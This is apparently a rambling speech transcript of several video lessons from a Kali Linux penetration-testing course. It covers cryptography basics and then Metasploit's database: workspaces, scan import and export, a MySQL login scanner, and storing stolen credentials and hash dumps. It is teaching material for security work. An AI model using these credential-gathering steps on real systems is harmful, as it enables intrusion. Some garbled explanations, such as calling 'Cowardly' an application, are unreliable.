raised to n where n is less than 2, and this might go completely bouncer for you and you might not understand any of these things, and I completely understand that. So to be more precise, the birthday theorem was previously known as capture recapture statistics, which was invented in the 1930s to count fish. Yeah, seriously, fish. Suppose, let's say there are n number of fish in a lake and you can catch m number of them, tag them and throw them back. Then when you first catch a fish you have tagged already, m should be about the square root of n. And the intuitive reason this holds is that once you have vn number of samples, each could potentially match any of the others. So the number of possible matches is about v capital N, v capital N, or just n, which is what you exactly need. So this might be a bit confusing for you to understand. You can just go ahead and repeat the tutorial, but I cannot make it more easier than it is exactly what I could say. Or I can say that that's the most easier definition I could give you right now. You can go ahead and search multiple things on the web to go ahead and search more about the birthday theorem. But I have actually went ahead and researched a lot of things about birthday theorem, and this was the easiest I could go ahead and teach you right now. So the birthday theorem has many applications for security engineer. Let's say, for example, if we have a biometric system that can authenticate a person's claim, identify with a probability of 1 in a million that two randomly selected subjects will be falsely identified as the same person. This does not mean that we can use it as a reliable means of identification in a university with a user population of 20,000 staff and patients, just because there will be almost 200 million possible pairs. In fact, you can expect to find the first collision, the first pair of people who can be mistaken for each other by the system once you have, let's say, somewhat 1,000 people enrolled. In some application collisions, search attacks are not a problem, such as in a challenge response protocol where an attacker would have to be able to find the answer to the challenge just issued, where you can prevent challenges from repeating itself. For example, challenge might not be really random but generated by encrypting a counter. In identify friend or foe IFF systems, for example, common equipment has a response length of 40 to 80 bits, and that's how what birthday theorems are. After that, we have random generators, that's stream ciphers versus the block ciphers. And the second basic cryptographic primitive is the random generator, also known as a key stream generator or a stream cipher. This is also a random function, but unlike in the hash function case, it has a short input and a long output. So if we had a good pseudo-random function whose input and output were a billion bits long, and we never wanted to handle any objects other larger than this, we could turn it into a hash function by throwing away all but a few thousand bits of the output, and a stream cipher by padding all but a few hundred bits of the input with a constant. At the conceptual level, however, it's common to think of a stream cipher as a random oracle whose input length is fixed, while the output is a very long stream of bits known as key stream. It can be again used to quite simply, to protect the confidentiality of backup data. We can go to the key stream generator, enter a key, get a long file of random bits, be it exclusive or with our plain text data to get ciphertext, which we then send to our backup contractor. We can think of the elf generating a random tape of the required length each time he is presented with a new key as input, giving it to us and keeping a copy of it on his scroll for reference in case he is given the same input again. If we need to recover the data, we go back to the generator, enter the same key, get the same long file of random data and exclusive, or it with our ciphertext to get our plain text data back again. Other people with access to the keystream generator won't be able to generate the same keystream unless they know the key exactly. and that's what the stream ciphers are. As for block ciphers, it's the third type of primitive and the most important in modern commercial cryptography is the block cipher, which I will model as the random permutation. Here, the function is invertible. So let me just skip. Okay, and yeah, I was saying invertible. So the input plain text and the output ciphertext are of fixed size. With Playfair, let's say both input and output are 2 characters. With DES, they are both bit strings of 64 bits. Whatever the number of symbols and the underlying alphabet encryption acts on a block of fixed length. So if you want to encrypt a shorter input, you have to pad it, as with our final Z in our Playfair example. So you can visualize block encryption such as we have an elf in a box with a dice and a scroll. On the left is a column of plain text and on the right is a column of ciphertext. So when we ask the elf to encrypt a message, it checks in the left hand column to see if it has a record of it. If not, it uses dice to generate a random ciphertext of the appropriate size, and it should be one that does not appear in the right hand column of the scroll, and write down the plain ciphertext in the scroll. If it does find a record, it gives us the corresponding ciphertext from the right hand column, and when it is asked to decrypt, the elf does the same but with the function on the columns reversed. So he takes the input ciphertext, checks it, but this time on the right hand scroll, and if he finds it, he gives the message with which it was previously associated. If not, he generates a message at random which does not already appear in the left hand column and notes it down. A block cipher is a keyed family of pseudo-random permutations. For each key, we have a single permutation that is, let's say, independent of each other. So you can think of each key as corresponding to a different score. The intuitive idea over here is that given the plain text and the key, a cipher machine should output the ciphertext, and given the ciphertext and the key, it should output the plain text. But given only the plain text and the ciphertext, it should output nothing. And that's how they work exactly. And after that, now we have the digital signature. The final primitive over here, which I will define here today, is the digital signature. The basic idea is that a signature on a message can be created by only one person, but it can be checked by anyone. It can thus perform the sort of function in the electronic world that ordinary signatures do in the world of paper. Signature schemes can be deterministic or randomized. In the first, computing a signature on a message will always give the same result. In the second, it will give a different result each time you compute. And when you go and when it provides different results each time you compute, it is more like a handwritten signature. So no two are ever alike, but the bank has a means of deciding whether a given signature specimen is genuine or forged. So similarly, signature schemes may or may not support message recovery. If they do, then given the signature, anyone can recover the message on which it was generated. And if they don't, then the verifier needs to know or catch the message before he can perform the verification. So there are also more specialized signature schemes such as blind signatures and threshold signatures, but I will postpone the discussion for now. Formally, a signature scheme like public encryption key scheme has a key pair generation function that given a random input R will return two keys. So SNR, that's the private signing key, and VR, the public signature verification key, with properties such as given the public signature verification key VR, it is infeasible to compute the private signature key as R. And there's a digital signature function that given a message M and a private signature key as R, it will produce a signature SIGSR, that's size R, for the M. And there is a signature verification function that given the signature size RM and the public signature verification key VR will always output true if the signature was computed correctly with SR, otherwise it will go ahead and give the output as false. So yep, and that would be it for this tutorial. I'll be ending with this digital signature platform. In the next tutorial, I'll be going ahead and completing the basics parts and the advantages and disadvantages of ciphertext. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. Today I will be continuing with the digital signatures and the different basic parts of a cryptology or cryptography. So before I proceed, in our random oracle model, we can model a digital signature algorithm as well, and that can act as a random function that reduces any input message to a one-way hash value of fixed length, followed by a special kind of cipher block, or in which the elf will perform the operation in one direction known as signature for only one principal, while in the other direction it will perform a verification of anybody. So starting off with the basic parts of there are four basic parts in a cryptography. So the first one is the plain text. It is an unscrambled information to be transmitted, and it could be a simpler text document, a credit card number, a password, a bank account number, or sensitive information such as payroll data, personal information, or personal information, or secret formula being transmitted between organizations. The second part is the ciphertext. A ciphertext represents a plain text rendered unintelligible by the application of a mathematical algorithm. Ciphertext is the encrypted plain text that is transmitted to the receiver. After that, we have the cryptographic algorithm. That's a mathematical formula which is used to scramble the plain text to yield the ciphertext. Converting plain text to ciphertext using the cryptographic algorithm is called as encryption, and converting the ciphertext back to plain text using the same cryptographic algorithm is called as the decryption. After that, we have the final part, that is the key. Mathematical value or formula or process that determines how a plain text message is encrypted or decrypted. The key is the only way to decipher the scrambled information. And yeah, these are the four parts of actually the actual cryptography and how it looks like. So, and finally, we come to the advantages and disadvantages of cryptography. So, even though public key cryptography is the accepted standard, it's not foolproof. For this reason, it has not completely replaced symmetric cryptography. So, there are some advantages and disadvantages of it. The advantages being that the biggest advantage of public key cryptography is that the secure nature of the private key. In fact, it never needs to be transmitted or revealed to anyone. It enables the use of digital signatures and digital timestamps as well, which is, as of now, the very secure technique to signature authorization. So I will look into digital timestamps and digital signatures in a moment. The disadvantages are that transmission time for documents encrypted using public key cryptography and are significantly slower than the symmetric cryptography. In fact, transmission of very large documents is prohibitive. And the other part is that the key sizes must be significantly larger than symmetric cryptography to achieve the same level of protection. And the final con would be that the public key cryptography is susceptible to impersonation attacks. So, yeah, no one can be held responsible for that though. So, let me explain this to you with an example. The ABC company maintains a payroll information for a variety of organizations. The payroll information is frequently transmitted over the internet from participating companies. So, for security reasons, the ABC company conducts all of its internet transactions using public key cryptography. The company owns both public and private key encryption. The public key is made available to all participating organizations and, in fact, is openly available to anyone who wants to download it from the ABC website. The private key is kept secure in bank vault at, let's say, ABC headquarters. So when the XYZ company wants to transmit its payroll data to the ABC company, it first encrypts the data using the ABC company's public key. Once it is encrypted, the scrambled payroll data is transmitted securely over the internet to the ABC company's processing department. If the information is intercepted along the way, all the interceptors will see is scrambled information and nothing else. Even if the public key, which is very possible, they will not be able to unscramble the information. So the only private key can do that. Once the information is received by ABC, the private key is used to unscramble the information, allowing the processing document to process the payroll. Using symmetric cryptography, the ABC company would have to deliver through some secure means, such as a courier, a copy of its one and only private key. Since the same key is used to both encrypt and decrypt the information, both sender and receiver must have a copy. So if XYZ is a new client for ABC, ABC must first send a copy of the secret key so that XYZ can encrypt its payload information and transmit it to ABC. ABC, using the same key, decrypts the XYZ information and processes the payroll data. Since a system is only as strong as its the weakest link, key security during transmission becomes an important or extremely important for XYZ as encrypting the data. As mentioned earlier, public key cryptography lends itself to a new technology called as digital signatures. Digital signatures involve a reversing of the normal public-private encryption-decryption process. So here is an example that demonstrates its use. I'll give you one more example for that. Let's say Mary wants to. Okay, I had. Okay. Let's say, for example, Mary wants to send the ABC company a request for a special document. Before the ABC company can send that document, they must be assured that the requester is actually Mary and not some person impersonating her. So, a digital signature can verify Mary's validity to ABC in such a way. Mary first encrypts her name using her private key. She then encrypts the request along with the encrypted name using the ABC company's well known public key. When the ABC company receives the message, it decrypts the request using its private key and then decrypts the signature using Mary's well publicized public key. If the name decrypts successfully, then it must be Mary's signature, since she is the only one who could have encrypted it with her secret private key. The request can be safely processed. Digital signatures are gaining popularity in many internet transactions involving signature verification, such as contracts and other legal negotiations, as well as court documents. Recent enhancements to digital signatures include such as digital timestamps. Digital timestamps apply when a criteria to a digital signature by attaching a widely publicized document or summary number to the signature. The summary number is only produced at some given point of time, which is essentially linking the signature to a certain date or time. It's an especially effective technology since it doesn't rely on the security of keys. But there are several other ways as to how you can go ahead and protect your key. One of them is that you need to be smart so that any other person who is actually going ahead and using these stuff do not know what you're exactly doing, because if someone has an idea that there is some or the other way to go ahead and get inside your private space, then it will be very hard for any of them to go ahead and actually gain access to your organization. So yeah, that would be it for this tutorial, and that's how cryptanalysis, encryption, and detection attack works. So that's it for this tutorial. In the next tutorial, we'll be taking a look at session hijacking and cookie stealing. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be learning about the database of Metasploit in detail, and after that we will be checking about the session hijacking and session hijacking for secure layers, that's HTTPS. So let me go ahead and fire up my Kali Linux. Okay, enter. Metasploit has n number of databases, and it's like you can say that it's infinite because it's never ending. The more you keep on learning, the more there is to learn. So in this tutorial, I'll be going ahead and giving you detailed information about database. I won't be able to cover everything, but I will be covering most of the things today. So most of the important things. Okay, perfect. So I'll just go ahead and fire up my terminal. Okay. So when you're conducting a penetration testing on any of your client, it is frequently a challenge to keep track of everything you have done to the target network. This is where having a database configured can be a great time saver. And Metasploit has built-in support for PostgreSQL and a database system. I have taught you previously about the MySQL, how we could go ahead and use the MySQL or the SQL injection and the SQL map to go ahead and hack into different stuff. So in this tutorial, I'll be teaching you about the Metasploit database. So the system allows quick and easy access to scan information, and the calculator gives us the ability to import and export scan results from various third-party tools. We can also use this information to configure module options rather quickly. Most importantly, it helps us keep our results clean and organized. So I'll just first go and see if I could get something from over here. Okay, so no help topics match database, try help, and so I'll just go and type MSF console. So let's go ahead and start or set up our Metasploit database. And in Cal Linux, you will need to start the PostgreSQL server before using the database. So let's go ahead and first start service PostgreSQL start. Perfect. And once you have started the Metasploit service, it will create a MSF3 data user and database called as MSF3. So I'll just have to go ahead and start the same thing again. That's service. I'll just go ahead and close this one. Type Metasploit start. So when we load up the MSF console and run the database status, we can confirm that Metasploit is successfully connected to the database. As you can see over here which has been connected. So I can go ahead and type db underscore status. Okay, I need to go ahead and run that in the MSF console command, I believe. Once we started, let's go ahead and check whether our database is connected or not. As you can see, it has started to create the keys that we asked it to. This is the database that it's loading along with the PostgreSQL server. Perfect. So let's go ahead and check whether our database has connected. db underscore status. Okay, perfect. As you can see, PostgreSQL is connected to the MSF3. So seeing this capability is it's meant to keep track of our activities and scans in order. It's very imperative that we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called as workspaces. This gives us the ability to save different scans from different locations, networks, and subnets, for example. So, issuing the workspace command from the default Metasploit console will display the current selected workspaces. The default workspace is selected when connecting to the database, which is represented by the asterisk sign beside its name. So I'll just go ahead and type workspace, and as you can see, we have this current one is a default. As we can see that this can be quite in handy when it comes to keeping things neat. Let's change the current workspace to MSFU. So I'll just type workspace space MSFU. Okay, I believe it's not accepting. Let me check. Okay, it's not allowing itself to connect. I'll just go and type workspace, and let's see, it's still default. So creating and deleting a workspace, one can simply use the -a or -d. Let me just see what I could get. Okay, perfect. So as you can see, you can go and switch workspace by typing the workspace and specific stuff. And if you need to add a workspace, then I can use -a. To delete, I can use -d. To rename, I can go ahead and use the -e, and I'll just type workspace asterisk. Okay, so this is the default, the name of the workspace is default, as you can see from over here. So let me check if I could go ahead and use the workspace one. Okay, it's not there. Perfect. So I'll just go ahead and create another workspace. So I'll just type workspace -a, and I'll type, let's say, lab 4. That means I'm creating another workspace. If I just go ahead and type workspace again, as you can see, we have two workspaces right now, and lab 4 is the default one. After that, I can just go ahead and delete it by typing -d, and again I am back to the default one. Or so it's that simple. Using the same command and adding the -h switch will provide us with the commands and other capabilities. So from now on, any scanner imports from third-party applications will be saved into this workspace. Now that we are connected to our database and workspace setup, let's look at populating it with some data. First, we will look at the different types of database commands available to use using the help command from the MSF console. So I could just go ahead and type help, and let's see what all do we get. It's an extremely big list, so you will be needing to wait. But in the meantime, I'll say that it's actually importing and scanning all the necessary stuff that it has right now. And there's several ways that we can do this. From scanning a host or network directly from the console or importing a file from an earlier scan, we can start by importing an nmap scan of metasploitable to host. And this can be done using the database import followed by the part to our file. So as of now, I don't have the nmap scan, but I will surely show you how we could do that. So let me see. Okay, I believe my terminal has stopped. I'll just again go ahead and start it. Perfect. So let me check if okay, I'll first go ahead and import the data. I'll show you how we could go ahead and import the database. And okay, let's say for example, I'll just first go ahead and create a workspace, and after that I'll just go ahead and import the database slash slash. And if I had the nmap scan over here, I'll just go ahead and type. I don't have it right now, but I'm just showing you how we could do that. And after that, if you go to just go and hit enter, it will go ahead and select the specific nmap scan file. So once completed, we can go ahead and confirm the import by issuing the host command. So you could just type host and it will show you all the associated commands over here. This will display all the hosts stored in our current workspace. As of now, I don't have any. We can also scan a host directly from the MSF console db nmap. So just type db underscore nmap and it will go ahead and show me different options. So scan results will be saved in our current database, and the commands works the same way as the command line version of nmap. That's db nmap hyphen a space and 192.168.123.111. This is just an example. And after you go ahead and do that, I'll just go ahead and cancel it. It will go ahead and start the scanning. That's why. After that, you can just go ahead and type host. It will give you all the necessary details for that. So that would be it for this tutorial. In the next tutorial, I'll be continuing with the backing our data and exporting through different ways through the database command in Metasploit. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing. We are Kali next. So in this tutorial, we will be taking a look at going ahead and exporting our data and backing up our data through MSF console. So exporting our data outside the Metasploit environment is very simple. We can use the db underscore export command that will go ahead and gather all our required information, and it can be saved in an XML file. This format can be easily used and manipulated later for reporting purposes. The command has two outputs: XML format, which will export all the information currently stored in our active workspace, and the pwdump format, which exports everything related to the used or gathered credentials. So I'll just go ahead and type db underscore export hyphen h, and as you can see, we have these specific stuff that I could go ahead and import. So I could just type db underscore export and hyphen f xml slash root slash, and let's say if I had that in my workspace, the name of which was test, and the exported ml would be period xml. It won't work right now because I don't have any xml, but if I had, it would straight away go ahead and export all of these things, and using the host command I could again go ahead and see whatever I had imported. So now that we can go ahead and import and export information to and from our database, let us look at how we can go ahead and use this information within the MSF console. Many commands are available to search for specific information stored in our database: host name, address, discovered services, etc. We can even use the resulting data to populate module settings such as remote host. We will look how this is done a bit later. So the host command was used now to confirm the presence of data in our database. Let's look at different options available and see how we could use it to provide us with quick and useful information. Issuing the command -h with the host will display us this menu. So as you can see, we could add different hosts, delete different hosts, or we could only go ahead and show the given columns. You can set our host and output in a CSV format. Then you can search string to filter by. So we will start by asking the host command to display only the IP address and the OS type using the -c switch. So I'll just type host -c address, comma, OS underscore v. Okay. As you can see, I will only get the address and the OS flavor of whichever host I had. After that, we can also go ahead and set up different modules for that. That won't be a big deal as well. So another interesting feature that is available to us is it has the ability to search all our entries for something specific. Imagine that if we wish to find only the Linux-based machines from our scan, we will be able to use that using the -s option. This option can be combined with our previous example and it can help fine-tune our result. So I'll just type the same thing such as host -c address, comma os flavor -s, and I can just type Linux. So it will just go and show me all the available hosts which are having the kernel of Linux. Using the output of our this example, I can also go and feed into that the TCP scan auxiliary module. Yes, we could do that. So I'll just type show options, and as you can see that these are the different settings that we could go and modify. So we can see that by default nothing is set in our R host, and we'll add that -r switch to the host command and run the module. Hopefully it will run and scan our target without any problems. Then just type host -s linux space -r. So the list is empty and Cowardly is an application that goes and tries to scan and gain access into systems. So Cowardly is refusing to set our host. The reason being that we don't have anything in specific. Of course, this also works if our result contains more than one address. So I could just type host -r and it will show me the available host. And you can also see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the rhost away options for the SMB underscore version auxiliary module very quickly. The set rhost switch is available in almost all of the commands that interact with the database. So I could just type services and okay, I believe the services command was terminated. Okay, perfect. It's small. I could just type the services and it will give me the services information. If I could type H, it will give me all the information that I could add, modify, or delete. So much in the same way as the host command, we can specify which fields to be displayed. Coupled with the -s switch, we can also search for a service containing a particular string. So I could just type services -c name and info -s, or let's say before that info 192.168.172.16. So we could also do that. Or here, if I am trying to search all hosts contained in our database with a service name containing the string HTTP, then I could type something like info -s s HTTP. I could go ahead and do that. So the combination for searching the things like these are enormous. We can use specific ports or port ranges, full or partial service name when using the -s or the -S switches. So for all examples or just a few, it depends on us. The list goes on, and so I'll just show you a few examples, but you may need to experiment with these features in order to get what you want exactly and need out your searches. So you just type services -c info name -p 445. It means over here the port is 445. I could go ahead and do that, or I could type services -c port and protocol state -p 70 to 81. That means gathering all the protocol and state from the port between 70 to 81. Or I could do something like, let's say, services -s http -c port, and that means to go ahead and check for a port. It will go ahead and gather all the information. Or I could do like something like services -s unr. It will go ahead and give me all of these things in under one command. After that, we have the cxp export as well. So both the host and services commands give us a means of saving our query results into a file. The file format is a comma separated value, or CSV, that's what I call it, followed by the -o with the path and the file name. The information that has been displayed on the screen at this point will now be saved to the disk. So I can just type services -s http -c port 192.168.16.132, and I could again go and type -o and the exact place where it is at root slash, let's say the space was test and http period csv. It will go ahead and save the comma separated value over there. So after that we could type host -s linux -o slash root slash test slash linux dot csv, and it will only search if you had that cxv folder over there. As we have it, it's searching. After that I could just go and if I wanted to read, I could type cat slash root slash test slash linux period csv. So since I don't have anything over there, it won't be able to read. If I go and type Linux, it will still won't be able to read because we don't have anything over here. If I wanted to go and reach the HTTP, I could type HTTP and it will show me whatever there it was in the HTTP file. So yeah, that's how we could go and do that. After that, we will that would be it for this tutorial. In the next tutorial, I'll be going ahead and teaching you about the credentials and gathering different information through the HTTP server. Or let's do one thing. I'll just go ahead and complete that in this tutorial only. So if we could also go and gather credentials by typing creds, and it will show us all the wanting credentials. The credential command is used to manage found and used credentials for targets in our database. Running this command without any options will display currently saved credentials. So as with the db_nmap command, successful results relating to credentials will be automatically saved to our active workspace. Let's run the auxiliary module MySQL login and see what happens when Metasploit scans our server. So I'll just select auxiliary. Let me check. I'll use just type MySQL. I'll just first search for the MySQL underscore login. Okay. I have it in the auxiliary version. So I'll just type use auxiliary scanner MySQL login. Perfect. So once I have over here, I'll just go and type run and I'll see. As you can see, it has failed to validate the rhost since we don't have the rhost. So I'll just type set rhost 92.168.13.12. Some random digits. And if I go ahead and run, it will go ahead and run the specific module towards that, and it will give me the specific stuff. If I wanted the credentials after I have run that, I can just go and type creds and it will give me the saved credentials. So we can see that the module was able to connect to a MySQL server, and because of this, Metasploit saved the credentials in our database automatically for future reference. So during post-exploitation of a host, gathering user credential is an important activity in order to further penetrate to a target's network. And as we gathered sets of credentials, we can add them to our database with the creds-a and we could command, and we could actually go ahead and save that. Yeah, I don't think it will go ahead and quit. After this, we can also go ahead and type the credentials along with the IP address, the port, and the administrator, and we could go ahead and gain access to that. So you just type credentials -a and 192.168.12.132. Look, wait, let me go back. Okay, and I just type credentials and -a and 192.68.12.132 -b. That means the port would be 445. I want to access it as administrator. Perfect. And the password would be hash. I'll go ahead and do this, and after this I could straight away go ahead and get the credentials. And once I have compromised the system, one of the objective may be to go ahead and receive the hash dump files. So I could just go ahead and type it something like loot to go ahead and gather these commands. So from either a Windows or Unix system, in an event of a successful hash dump, this information will be stored in our database, and we can view these dumps using the loot command. So it would be loot and not the capital L. And once we have all of these sessions by exploiting and post gathering, we can straight away go ahead and type the loot command to go ahead and gather information. So that's it for this tutorial, and that would be end of the database session for the Kali Linux. In the next tutorial, I'll be starting in with the session hijacking and the secure layer stripping.